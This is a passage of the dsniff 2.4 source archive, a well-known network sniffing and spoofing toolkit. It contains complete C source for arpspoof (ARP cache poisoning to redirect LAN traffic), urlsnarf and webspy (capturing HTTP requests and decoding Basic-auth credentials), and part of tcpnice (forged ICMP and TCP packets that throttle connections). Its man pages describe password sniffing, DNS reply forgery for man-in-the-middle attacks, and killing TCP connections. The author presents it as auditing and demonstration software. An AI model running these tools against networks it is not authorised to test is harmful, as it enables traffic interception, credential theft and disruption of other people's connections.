send_tcp_window_advertisement(int sock, struct libnet_ip_hdr *ip, struct libnet_tcp_hdr *tcp) { int len; ip->ip_hl = 5; ip->ip_len = htons(IP_H + TCP_H); ip->ip_id = libnet_get_prand(PRu16); memcpy(buf, (u_char *)ip, IP_H); tcp->th_off = 5; tcp->th_win = htons(MIN_WIN); memcpy(buf + IP_H, (u_char *)tcp, TCP_H); libnet_do_checksum(buf, IPPROTO_TCP, TCP_H); len = IP_H + TCP_H; if (libnet_write_ip(sock, buf, len) != len) warn("write"); fprintf(stderr, "%s:%d > %s:%d: . ack %lu win %d\n", libnet_host_lookup(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport), libnet_host_lookup(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport), ntohl(tcp->th_ack), 1); } static void send_icmp_source_quench(int sock, struct libnet_ip_hdr *ip) { struct libnet_icmp_hdr *icmp; int len; len = (ip->ip_hl * 4) + 8; libnet_build_ip(ICMP_ECHO_H + len, 0, libnet_get_prand(PRu16), 0, 64, IPPROTO_ICMP, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, buf); icmp = (struct libnet_icmp_hdr *)(buf + IP_H); icmp->icmp_type = ICMP_SOURCEQUENCH; icmp->icmp_code = 0; memcpy((u_char *)icmp + ICMP_ECHO_H, (u_char *)ip, len); libnet_do_checksum(buf, IPPROTO_ICMP, ICMP_ECHO_H + len); len += (IP_H + ICMP_ECHO_H); if (libnet_write_ip(sock, buf, len) != len) warn("write"); fprintf(stderr, "%s > %s: icmp: source quench\n", libnet_host_lookup(ip->ip_dst.s_addr, 0), libnet_host_lookup(ip->ip_src.s_addr, 0)); } static void send_icmp_frag_needed(int sock, struct libnet_ip_hdr *ip) { struct libnet_icmp_hdr *icmp; int len; len = (ip->ip_hl * 4) + 8; libnet_build_ip(ICMP_MASK_H + len, 4, libnet_get_prand(PRu16), 0, 64, IPPROTO_ICMP, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, buf); icmp = (struct libnet_icmp_hdr *)(buf + IP_H); icmp->icmp_type = ICMP_UNREACH; icmp->icmp_code = ICMP_UNREACH_NEEDFRAG; icmp->hun.frag.pad = 0; icmp->hun.frag.mtu = htons(MIN_MTU); memcpy((u_char *)icmp + ICMP_MASK_H, (u_char *)ip, len); libnet_do_checksum(buf, IPPROTO_ICMP, ICMP_MASK_H + len); len += (IP_H + ICMP_MASK_H); if (libnet_write_ip(sock, buf, len) != len) warn("write"); fprintf(stderr, "%s > %s: icmp: ", libnet_host_lookup(ip->ip_dst.s_addr, 0), libnet_host_lookup(ip->ip_src.s_addr, 0)); fprintf(stderr, "%s unreachable - need to frag (mtu %d)\n", libnet_host_lookup(ip->ip_src.s_addr, 0), MIN_MTU); } static void tcp_nice_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt) { struct libnet_ip_hdr *ip; struct libnet_tcp_hdr *tcp; int *sock, len; sock = (int *)user; pkt += pcap_off; len = pcap->caplen - pcap_off; ip = (struct libnet_ip_hdr *)pkt; if (ip->ip_p != IPPROTO_TCP) return; tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2)); if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST)) return; if (ntohs(ip->ip_len) > (ip->ip_hl << 2) + (tcp->th_off << 2)) { if (Opt_icmp) send_icmp_source_quench(*sock, ip); if (Opt_win) send_tcp_window_advertisement(*sock, ip, tcp); if (Opt_pmtu) send_icmp_frag_needed(*sock, ip); } } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c, sock; char *intf, *filter, ebuf[PCAP_ERRBUF_SIZE]; pcap_t *pd; intf = NULL; while ((c = getopt(argc, argv, "i:AIMh?V")) != -1) { switch (c) { case 'i': intf = optarg; break; case 'A': Opt_win = 1; break; case 'I': Opt_icmp = 1; break; case 'M': Opt_pmtu = 1; break; default: usage(); break; } } if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) errx(1, "%s", ebuf); argc -= optind; argv += optind; if (argc == 0) usage(); if ((Opt_win | Opt_icmp | Opt_pmtu) == 0) Opt_win = Opt_icmp = Opt_pmtu = 1; filter = copy_argv(argv); if ((pd = pcap_init(intf, filter, 128)) == NULL) errx(1, "couldn't initialize sniffing"); if ((pcap_off = pcap_dloff(pd)) < 0) errx(1, "couldn't determine link layer offset"); if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1) errx(1, "couldn't initialize sending"); libnet_seed_prand(); warnx("listening on %s [%s]", intf, filter); pcap_loop(pd, -1, tcp_nice_cb, (u_char *)&sock); /* NOTREACHED */ exit(0); } dsniff-2.4/urlsnarf.c0000600000175000017500000001170607254105265014501 0ustar lucianoluciano/* * urlsnarf.c * * Sniff the network for HTTP request URLs, output in CLF format. * * Copyright (c) 1999 Dug Song * * $Id: urlsnarf.c,v 1.35 2001/03/15 09:26:13 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcaputil.h" #include "buf.h" #include "base64.h" #include "version.h" #define DEFAULT_PCAP_FILTER "tcp port 80 or port 8080 or port 3128" u_short Opt_dns = 1; int Opt_invert = 0; regex_t *pregex = NULL; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: urlsnarf [-n] [-i interface] [[-v] pattern [expression]]\n"); exit(1); } static int regex_match(char *string) { return (pregex == NULL || ((regexec(pregex, string, 0, NULL, 0) == 0) ^ Opt_invert)); } static char * timestamp(void) { static char tstr[32], sign; struct tm *t, gmt; time_t tt = time(NULL); int days, hours, tz, len; gmt = *gmtime(&tt); t = localtime(&tt); days = t->tm_yday - gmt.tm_yday; hours = ((days < -1 ? 24 : 1 < days ? -24 : days * 24) + t->tm_hour - gmt.tm_hour); tz = hours * 60 + t->tm_min - gmt.tm_min; len = strftime(tstr, sizeof(tstr), "%e/%b/%Y:%X", t); if (len < 0 || len > sizeof(tstr) - 5) return (NULL); if (tz < 0) { sign = '-'; tz = -tz; } else sign = '+'; snprintf(tstr + len, sizeof(tstr) - len, " %c%.2d%.2d", sign, tz / 60, tz % 60); return (tstr); } static int process_http_request(struct tuple4 *addr, u_char *data, int len) { struct buf *msg, buf; char *p, *req, *uri, *user, *vhost, *referer, *agent; int i; buf_init(&buf, data, len); while ((i = buf_index(&buf, "\r\n\r\n", 4)) >= 0) { msg = buf_tok(&buf, NULL, i); msg->base[msg->end] = '\0'; buf_skip(&buf, 4); if (!regex_match(buf_ptr(msg))) continue; if ((req = strtok(buf_ptr(msg), "\r\n")) == NULL) continue; if (strncmp(req, "GET ", 4) != 0 && strncmp(req, "POST ", 5) != 0 && strncmp(req, "CONNECT ", 8) != 0) continue; if ((uri = strchr(req, ' ')) == NULL) continue; *uri++ = '\0'; if (strncmp(uri, "http://", 7) == 0) { for (uri += 7; *uri != '/'; uri++) ; } user = vhost = referer = agent = NULL; while ((p = strtok(NULL, "\r\n")) != NULL) { if (strncasecmp(p, "Authorization: Basic ", 21) == 0) { p += 21; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; user = p; if ((p = strchr(p, ':')) != NULL) *p = '\0'; } else if (strncasecmp(p, "Host: ", 6) == 0) { vhost = p + 6; } else if (strncasecmp(p, "Referer: ", 9) == 0) { referer = p + 9; } else if (strncasecmp(p, "User-Agent: ", 12) == 0) { agent = p + 12; } else if (strncasecmp(p, "Content-length: ", 16) == 0) { i = atoi(p + 16); buf_tok(NULL, NULL, i); } } if (user == NULL) user = "-"; if (vhost == NULL) vhost = libnet_host_lookup(addr->daddr, Opt_dns); if (referer == NULL) referer = "-"; if (agent == NULL) agent = "-"; printf("%s - %s [%s] \"%s http://%s%s\" - - \"%s\" \"%s\"\n", libnet_host_lookup(addr->saddr, Opt_dns), user, timestamp(), req, vhost, uri, referer, agent); } fflush(stdout); return (len - buf_len(&buf)); } static void sniff_http_client(struct tcp_stream *ts, void **yoda) { int i; switch (ts->nids_state) { case NIDS_JUST_EST: ts->server.collect = 1; case NIDS_DATA: if (ts->server.count_new != 0) { i = process_http_request(&ts->addr, ts->server.data, ts->server.count - ts->server.offset); nids_discard(ts, i); } break; default: if (ts->server.count != 0) { process_http_request(&ts->addr, ts->server.data, ts->server.count - ts->server.offset); } break; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; while ((c = getopt(argc, argv, "i:nvh?V")) != -1) { switch (c) { case 'i': nids_params.device = optarg; break; case 'n': Opt_dns = 0; break; case 'v': Opt_invert = 1; break; default: usage(); } } argc -= optind; argv += optind; if (argc > 0 && strlen(argv[0])) { if ((pregex = (regex_t *) malloc(sizeof(*pregex))) == NULL) err(1, "malloc"); if (regcomp(pregex, argv[0], REG_EXTENDED|REG_NOSUB) != 0) errx(1, "invalid regular expression"); } if (argc > 1) { nids_params.pcap_filter = copy_argv(argv + 1); } else nids_params.pcap_filter = DEFAULT_PCAP_FILTER; nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; if (!nids_init()) errx(1, "%s", nids_errbuf); nids_register_tcp(sniff_http_client); warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); nids_run(); /* NOTREACHED */ exit(0); } dsniff-2.4/version.h0000600000175000017500000000002707255326341014332 0ustar lucianoluciano#define VERSION "2.4" dsniff-2.4/vroot.h0000600000175000017500000001150207204257550014015 0ustar lucianoluciano/*****************************************************************************/ /** Copyright 1991 by Andreas Stolcke **/ /** Copyright 1990 by Solbourne Computer Inc. **/ /** Longmont, Colorado **/ /** **/ /** All Rights Reserved **/ /** **/ /** Permission to use, copy, modify, and distribute this software and **/ /** its documentation for any purpose and without fee is hereby **/ /** granted, provided that the above copyright notice appear in all **/ /** copies and that both that copyright notice and this permis- **/ /** sion notice appear in supporting documentation, and that the **/ /** name of Solbourne not be used in advertising **/ /** in publicity pertaining to distribution of the software without **/ /** specific, written prior permission. **/ /** **/ /** ANDREAS STOLCKE AND SOLBOURNE COMPUTER INC. DISCLAIMS ALL WARRANTIES **/ /** WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF **/ /** MERCHANTABILITY AND FITNESS, IN NO EVENT SHALL ANDREAS STOLCKE **/ /** OR SOLBOURNE BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL **/ /** DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA **/ /** OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER **/ /** TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE **/ /** OR PERFORMANCE OF THIS SOFTWARE. **/ /*****************************************************************************/ /* * vroot.h -- Virtual Root Window handling header file * * This header file redefines the X11 macros RootWindow and DefaultRootWindow, * making them look for a virtual root window as provided by certain `virtual' * window managers like swm and tvtwm. If none is found, the ordinary root * window is returned, thus retaining backward compatibility with standard * window managers. * The function implementing the virtual root lookup remembers the result of * its last invocation to avoid overhead in the case of repeated calls * on the same display and screen arguments. * The lookup code itself is taken from Tom LaStrange's ssetroot program. * * Most simple root window changing X programs can be converted to using * virtual roots by just including * * #include * * after all the X11 header files. It has been tested on such popular * X clients as xphoon, xfroot, xloadimage, and xaqua. * It also works with the core clients xprop, xwininfo, xwd, and editres * (and is necessary to get those clients working under tvtwm). * It does NOT work with xsetroot; get the xsetroot replacement included in * the tvtwm distribution instead. * * Andreas Stolcke , 9/7/90 * - replaced all NULL's with properly cast 0's, 5/6/91 * - free children list (suggested by Mark Martin ), 5/16/91 * - include X11/Xlib.h and support RootWindowOfScreen, too 9/17/91 */ #ifndef _VROOT_H_ #define _VROOT_H_ #include #include #include static Window VirtualRootWindowOfScreen(screen) Screen *screen; { static Screen *save_screen = (Screen *)0; static Window root = (Window)0; if (screen != save_screen) { Display *dpy = DisplayOfScreen(screen); Atom __SWM_VROOT = None; int i; Window rootReturn, parentReturn, *children; unsigned int numChildren; root = RootWindowOfScreen(screen); /* go look for a virtual root */ __SWM_VROOT = XInternAtom(dpy, "__SWM_VROOT", False); if (XQueryTree(dpy, root, &rootReturn, &parentReturn, &children, &numChildren)) { for (i = 0; i < numChildren; i++) { Atom actual_type; int actual_format; unsigned long nitems, bytesafter; Window *newRoot = (Window *)0; if (XGetWindowProperty(dpy, children[i], __SWM_VROOT, 0, 1, False, XA_WINDOW, &actual_type, &actual_format, &nitems, &bytesafter, (unsigned char **) &newRoot) == Success && newRoot) { root = *newRoot; break; } } if (children) XFree((char *)children); } save_screen = screen; } return root; } #undef RootWindowOfScreen #define RootWindowOfScreen(s) VirtualRootWindowOfScreen(s) #undef RootWindow #define RootWindow(dpy,screen) VirtualRootWindowOfScreen(ScreenOfDisplay(dpy,screen)) #undef DefaultRootWindow #define DefaultRootWindow(dpy) VirtualRootWindowOfScreen(DefaultScreenOfDisplay(dpy)) #endif /* _VROOT_H_ */ dsniff-2.4/webspy.c0000600000175000017500000001114007254077101014143 0ustar lucianoluciano/* * webspy.c * * Sniff a user's web session, follow it real-time in our browser. * * Copyright (c) 1999 Dug Song * * $Id: webspy.c,v 1.28 2001/03/15 08:33:05 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include "base64.h" #include "buf.h" #include "version.h" /* for jwz's remote.c. */ extern int mozilla_remote_commands (Display *, Window, char **); char *expected_mozilla_version = "4.7"; char *progname = "webspy"; Display *dpy; char cmd[2048], *cmdtab[2]; in_addr_t host; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: %s [-i interface] host\n", progname); exit(1); } static int is_display_uri(char *uri) { static char *good_prefixes[] = { NULL }; static char *good_suffixes[] = { ".html", ".htm", "/", ".shtml", ".cgi", ".asp", ".php3", ".txt", ".xml", ".asc", NULL }; int len, slen; char **pp, *p; /* Get URI length, without QUERY_INFO */ if ((p = strchr(uri, '?')) != NULL) { len = p - uri; } else len = strlen(uri); for (pp = good_suffixes; *pp != NULL; pp++) { if (len < (slen = strlen(*pp))) continue; if (strncasecmp(&uri[len - slen], *pp, slen) == 0) return (1); } for (pp = good_prefixes; *pp != NULL; pp++) { if (len < (slen = strlen(*pp))) continue; if (strncasecmp(uri, *pp, slen) == 0) return (1); } return (0); } /* XXX - we should really be sniffing (and HTML-parsing) the returned pages, not just the request URLs. this is why we don't handle frames, some CGIs, banner ads, etc. correctly. */ static int process_http_request(struct tuple4 *addr, u_char *data, int len) { struct buf *msg, buf; char *p, *req, *uri, *vhost, *auth; int i; buf_init(&buf, data, len); while ((i = buf_index(&buf, "\r\n\r\n", 4)) >= 0) { msg = buf_tok(&buf, NULL, i); msg->base[msg->end] = '\0'; buf_skip(&buf, 4); req = strtok(buf_ptr(msg), "\r\n"); if (strncmp(req, "GET ", 4) != 0 && strncmp(req, "POST ", 5) != 0 && strncmp(req, "CONNECT ", 8) != 0) continue; vhost = auth = NULL; uri = strchr(req, ' '); *uri++ = '\0'; strtok(uri, " "); if (strncmp(uri, "http://", 7) == 0) { vhost = uri + 7; uri = strchr(vhost, '/'); memmove(uri + 1, uri, strlen(uri)); } if (!is_display_uri(uri)) continue; while ((p = strtok(NULL, "\r\n")) != NULL) { if (strncasecmp(p, "Authorization: Basic ", 21) == 0) { p += 21; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; auth = p; } else if (strncasecmp(p, "Host: ", 6) == 0) { vhost = p + 6; } } if (auth == NULL) auth = ""; if (vhost == NULL) vhost = libnet_host_lookup(addr->daddr, 0); snprintf(cmd, sizeof(cmd), "openURL(http://%s%s%s%s)", auth, *auth ? "@" : "", vhost, uri); fprintf(stderr, "%s\n", cmd); mozilla_remote_commands(dpy, 0, cmdtab); } return (len - buf_len(&buf)); } static void sniff_http_client(struct tcp_stream *ts, void **yoda) { int i; /* Only handle HTTP client traffic. */ if (ts->addr.saddr != host || (ts->addr.dest != 80 && ts->addr.dest != 3128 && ts->addr.dest != 8080)) return; switch (ts->nids_state) { case NIDS_JUST_EST: /* Collect data. */ ts->server.collect = 1; case NIDS_DATA: if (ts->server.count_new != 0) { i = process_http_request(&ts->addr, ts->server.data, ts->server.count - ts->server.offset); nids_discard(ts, i); } break; default: if (ts->server.count != 0) { process_http_request(&ts->addr, ts->server.data, ts->server.count - ts->server.offset); } break; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; while ((c = getopt(argc, argv, "i:h?V")) != -1) { switch (c) { case 'i': nids_params.device = optarg; break; default: usage(); } } argc -= optind; argv += optind; if (argc != 1) usage(); cmdtab[0] = cmd; cmdtab[1] = NULL; if ((host = libnet_name_resolve(argv[0], 1)) == -1) errx(1, "unknown host"); if ((dpy = XOpenDisplay(NULL)) == NULL) errx(1, "connection to local X server failed!"); nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; if (!nids_init()) errx(1, "%s", nids_errbuf); nids_register_tcp(sniff_http_client); warnx("listening on %s", nids_params.device); nids_run(); /* NOTREACHED */ exit(0); } dsniff-2.4/arpspoof.c0000600000175000017500000001012407254077072014473 0ustar lucianoluciano/* * arpspoof.c * * Redirect packets from a target host (or from all hosts) intended for * another host on the LAN to ourselves. * * Copyright (c) 1999 Dug Song * * $Id: arpspoof.c,v 1.5 2001/03/15 08:32:58 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include "arp.h" #include "version.h" extern char *ether_ntoa(struct ether_addr *); static struct libnet_link_int *llif; static struct ether_addr spoof_mac, target_mac; static in_addr_t spoof_ip, target_ip; static char *intf; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: arpspoof [-i interface] [-t target] host\n"); exit(1); } static int arp_send(struct libnet_link_int *llif, char *dev, int op, u_char *sha, in_addr_t spa, u_char *tha, in_addr_t tpa) { char ebuf[128]; u_char pkt[60]; if (sha == NULL && (sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) { return (-1); } if (spa == 0) { if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0) return (-1); spa = htonl(spa); /* XXX */ } if (tha == NULL) tha = "\xff\xff\xff\xff\xff\xff"; libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt); libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, op, sha, (u_char *)&spa, tha, (u_char *)&tpa, NULL, 0, pkt + ETH_H); fprintf(stderr, "%s ", ether_ntoa((struct ether_addr *)sha)); if (op == ARPOP_REQUEST) { fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n", ether_ntoa((struct ether_addr *)tha), libnet_host_lookup(tpa, 0), libnet_host_lookup(spa, 0)); } else { fprintf(stderr, "%s 0806 42: arp reply %s is-at ", ether_ntoa((struct ether_addr *)tha), libnet_host_lookup(spa, 0)); fprintf(stderr, "%s\n", ether_ntoa((struct ether_addr *)sha)); } return (libnet_write_link_layer(llif, dev, pkt, sizeof(pkt)) == sizeof(pkt)); } #ifdef __linux__ static int arp_force(in_addr_t dst) { struct sockaddr_in sin; int i, fd; if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) return (0); memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = dst; sin.sin_port = htons(67); i = sendto(fd, NULL, 0, 0, (struct sockaddr *)&sin, sizeof(sin)); close(fd); return (i == 0); } #endif static int arp_find(in_addr_t ip, struct ether_addr *mac) { int i = 0; do { if (arp_cache_lookup(ip, mac) == 0) return (1); #ifdef __linux__ /* XXX - force the kernel to arp. feh. */ arp_force(ip); #else arp_send(llif, intf, ARPOP_REQUEST, NULL, 0, NULL, ip); #endif sleep(1); } while (i++ < 3); return (0); } static void cleanup(int sig) { int i; if (arp_find(spoof_ip, &spoof_mac)) { for (i = 0; i < 3; i++) { /* XXX - on BSD, requires ETHERSPOOF kernel. */ arp_send(llif, intf, ARPOP_REPLY, (u_char *)&spoof_mac, spoof_ip, (target_ip ? (u_char *)&target_mac : NULL), target_ip); sleep(1); } } exit(0); } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; char ebuf[PCAP_ERRBUF_SIZE]; int c; intf = NULL; spoof_ip = target_ip = 0; while ((c = getopt(argc, argv, "i:t:h?V")) != -1) { switch (c) { case 'i': intf = optarg; break; case 't': if ((target_ip = libnet_name_resolve(optarg, 1)) == -1) usage(); break; default: usage(); } } argc -= optind; argv += optind; if (argc != 1) usage(); if ((spoof_ip = libnet_name_resolve(argv[0], 1)) == -1) usage(); if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) errx(1, "%s", ebuf); if ((llif = libnet_open_link_interface(intf, ebuf)) == 0) errx(1, "%s", ebuf); if (target_ip != 0 && !arp_find(target_ip, &target_mac)) errx(1, "couldn't arp for host %s", libnet_host_lookup(target_ip, 0)); signal(SIGHUP, cleanup); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); for (;;) { arp_send(llif, intf, ARPOP_REPLY, NULL, spoof_ip, (target_ip ? (u_char *)&target_mac : NULL), target_ip); sleep(2); } /* NOTREACHED */ exit(0); } dsniff-2.4/dsniff.80000600000175000017500000000514007216440520014030 0ustar lucianoluciano.TH DSNIFF 8 .ad .fi .SH NAME dsniff \- password sniffer .SH SYNOPSIS .na .nf .fi \fBdsniff\fR [\fB-c\fR] [\fB-d\fR] [\fB-m\fR] [\fB-n\fR] [\fB-i \fIinterface\fR] [\fB-s \fIsnaplen\fR] [\fB-f \fIservices\fR] [\fB-t \fItrigger[,...]\fR]] [\fB-r\fR|\fB-w\fR \fIsavefile\fR] [\fIexpression\fR] .SH DESCRIPTION .ad .fi \fBdsniff\fR is a password sniffer which handles FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL protocols. .LP \fBdsniff\fR automatically detects and minimally parses each application protocol, only saving the interesting bits, and uses Berkeley DB as its output file format, only logging unique authentication attempts. Full TCP/IP reassembly is provided by libnids(3). .LP I wrote \fBdsniff\fR with honest intentions - to audit my own network, and to demonstrate the insecurity of cleartext network protocols. Please do not abuse this software. .SH OPTIONS .IP \fB-c\fR Perform half-duplex TCP stream reassembly, to handle asymmetrically routed traffic (such as when using arpspoof(8) to intercept client traffic bound for the local gateway). .IP \fB-d\fR Enable debugging mode. .IP \fB-m\fR Enable automatic protocol detection. .IP \fB-n\fR Do not resolve IP addresses to hostnames. .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP "\fB-s \fIsnaplen\fR" Analyze at most the first \fIsnaplen\fR bytes of each TCP connection, rather than the default of 1024. .IP "\fB-f \fIservices\fR" Load triggers from a \fIservices\fR file. .IP "\fB -t \fItrigger\fR[,...]" Load triggers from a comma-separated list, specified as \fIport\fR/\fIproto\fR=\fIservice\fR (e.g. 80/tcp=http). .IP "\fB-r \fIsavefile\fR" Read sniffed sessions from a \fIsavefile\fR created with the \fB-w\fR option. .IP "\fB-w \fIfile\fR" Write sniffed sessions to \fIsavefile\fR rather than parsing and printing them out. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .LP On a hangup signal \fBdsniff\fR will dump its current trigger table to \fIdsniff.services\fR. .SH FILES .IP \fI/usr/local/lib/dsniff.services\fR Default trigger table .IP \fI/usr/local/lib/dsniff.magic\fR Network protocol magic .SH "SEE ALSO" arpspoof(8), libnids(3), services(5), magic(5) .SH AUTHOR .na .nf Dug Song .SH BUGS \fBdsniff\fR's automatic protocol detection feature is based on the classic file(1) command by Ian Darwin, and shares its historical limitations and bugs. dsniff-2.4/dnsspoof.80000600000175000017500000000210407204257553014420 0ustar lucianoluciano.TH DNSSPOOF 8 .ad .fi .SH NAME dnsspoof \- forge replies to DNS address / pointer queries .SH SYNOPSIS .na .nf .fi \fBdnsspoof\fR [\fB-i \fIinterface\fR] [\fB-f \fIhostsfile\fR] [\fIexpression\fR] .SH DESCRIPTION .ad .fi \fBdnsspoof\fR forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to use. .IP "\fB-f \fIhostsfile\fR" Specify the pathname of a file in hosts(5) format. Only one hostname allowed per line (no aliases), although hostnames may contain wildcards (such as \fI*.doubleclick.net\fR). .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .LP If no \fIhostsfile\fR is specified, replies will be forged for all address queries on the LAN with an answer of the local machine's IP address. .SH FILES .IP \fI/usr/local/lib/dnsspoof.hosts\fR Sample hosts file. .SH "SEE ALSO" dsniff(8), hosts(5) .SH AUTHOR .na .nf Dug Song dsniff-2.4/mailsnarf.80000600000175000017500000000150407205667230014542 0ustar lucianoluciano.TH MAILSNARF 8 .ad .fi .SH NAME mailsnarf \- sniff mail messages in Berkeley mbox format .SH SYNOPSIS .na .nf .fi \fBmailsnarf\fR [\fB-i \fIinterface\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] .SH DESCRIPTION .ad .fi \fBmailsnarf\fR outputs e-mail messages sniffed from SMTP and POP traffic in Berkeley mbox format, suitable for offline browsing with your favorite mail reader (mail(1), pine(1), etc.). .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP \fB-v\fR "Versus" mode. Invert the sense of matching, to select non-matching messages. .IP \fIpattern\fR Specify regular expression for message header/body matching. .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .SH "SEE ALSO" dsniff(8), mail(1), pine(1) .SH AUTHOR .na .nf Dug Song dsniff-2.4/buf.h0000600000175000017500000000350107254077101013415 0ustar lucianoluciano/* * buf.h * * Buffer manipulation routines. * * Copyright (c) 2000 Dug Song * * $Id: buf.h,v 1.6 2001/03/15 08:33:05 dugsong Exp $ */ #ifndef BUF_H #define BUF_H typedef struct buf { u_char *base; int size; int offset; int end; } *buf_t; /* Initialize buffer. */ void buf_init(buf_t buf, u_char *data, int len); /* Allocate buffer. */ buf_t buf_new(int size); /* Free buffer. */ void buf_free(buf_t buf); /* Return pointer to buffer data. */ #define buf_ptr(b) ((b)->base + (b)->offset) /* Return length of buffer data. */ #define buf_len(b) ((b)->end - (b)->offset) /* Return remaining length of unused buffer. */ #define buf_left(b) ((b)->size - (b)->offset) /* Return size of buffer. */ #define buf_size(b) ((b)->size) /* Return offset in buffer. */ #define buf_tell(b) ((b)->offset) /* Reposition buffer offset. */ int buf_seek(buf_t buf, int offset, int whence); #define buf_skip(b, l) buf_seek(b, l, SEEK_CUR) #define buf_rewind(b) buf_seek(b, 0, SEEK_SET) /* Read from buffer. */ int buf_get(buf_t buf, void *dst, int len); /* Write to buffer. */ int buf_put(buf_t buf, void *src, int len); int buf_putf(buf_t buf, const char *fmt, ...); /* Finalize buffer. */ void buf_end(buf_t buf); /* Locate byte string in buffer. */ int buf_index(buf_t buf, void *ptr, int len); int buf_rindex(buf_t buf, void *ptr, int len); /* Compare buffer to byte string. */ int buf_cmp(buf_t buf, void *ptr, int len); /* Tokenize buffer, like strtok(3). */ buf_t buf_tok(buf_t buf, void *sep, int len); /* Get a sub-buffer from buffer. */ buf_t buf_getbuf(buf_t buf, int offset, int len); /* Get a word from buffer. */ buf_t buf_getword(buf_t buf, void *sep, int len); /* Convert buffer to allocated string. */ char * buf_strdup(buf_t buf); /* ASCII string test. */ int buf_isascii(buf_t buf); #endif /* BUF_H */ dsniff-2.4/tcpkill.80000600000175000017500000000144207254576314014237 0ustar lucianoluciano.TH TCPKILL 8 .ad .fi .SH NAME tcpkill \- kill TCP connections on a LAN .SH SYNOPSIS .na .nf .fi \fBtcpkill\fR [\fB-i \fIinterface\fR] [\fB-1\fR...\fB9\fR] \fIexpression\fR .SH DESCRIPTION .ad .fi \fBtcpkill\fR kills specified in-progress TCP connections (useful for libnids-based applications which require a full TCP 3-whs for TCB creation). .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP \fB-1\fR...\fB9\fR Specify the degree of brute force to use in killing a connection. Fast connections may require a higher number in order to land a RST in the moving receive window. Default is 3. .IP \fIexpression\fR Specify a tcpdump(8) filter expression to select the connections to kill. .SH "SEE ALSO" dsniff(8), tcpnice(8) .SH AUTHOR .na .nf Dug Song dsniff-2.4/tcpnice.80000600000175000017500000000144607254612350014215 0ustar lucianoluciano.TH TCPNICE 8 .ad .fi .SH NAME tcpnice \- slow down TCP connections on a LAN .SH SYNOPSIS .na .nf .fi \fBtcpnice\fR [\fB-A\fR] [\fB-I\fR] [\fB-M\fR] [\fB-i \fIinterface\fR] \fIexpression\fR .SH DESCRIPTION .ad .fi \fBtcpnice\fR slows down specified TCP connections on a LAN via "active" traffic shaping. .SH OPTIONS .IP \fB-A\fR Inject TCP tiny window advertisements. .IP \fB-I\fR Inject ICMP source quench replies. .IP \fB-M\fR Inject ICMP fragmentation-needed replies with tiny next-hop MTUs. .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP \fIexpression\fR Specify a tcpdump(8) filter expression to select the connections to slow down. .LP If no attack type is given, all attacks will be enabled. .SH "SEE ALSO" dsniff(8), tcpkill(8) .SH AUTHOR .na .nf Dug Song dsniff-2.4/urlsnarf.80000600000175000017500000000161007205671063014417 0ustar lucianoluciano.TH URLSNARF 8 .ad .fi .SH NAME urlsnarf \- sniff HTTP requests in Common Log Format .SH SYNOPSIS .na .nf .fi \fBurlsnarf\fR [\fB-n\fR] 